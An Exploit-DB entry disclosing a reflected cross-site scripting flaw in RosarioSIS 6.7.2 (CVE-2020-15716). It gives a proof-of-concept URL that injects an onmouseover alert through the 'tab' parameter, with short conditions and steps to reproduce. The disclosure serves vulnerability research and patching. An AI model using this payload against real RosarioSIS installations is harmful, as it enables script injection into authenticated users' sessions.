RosarioSIS 6.7.2 - Cross Site Scripting (XSS)

EDB-ID:

52450

CVE:

2020-15716

EDB Verified:

Author:

CodeSecLab

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2025-12-03

Vulnerable App:

# Exploit Title: RosarioSIS 6.7.2 - Cross Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15716


Proof Of Concept
http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

**Conditions**:  
1. User must be authenticated (as shown by the session checks in `Warehous.php`)
2. `modfunc` parameter must **not** be present in the request


Steps to Reproduce:
1. Log in as an admin user.
2. Send the request.
3. Observe the result

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services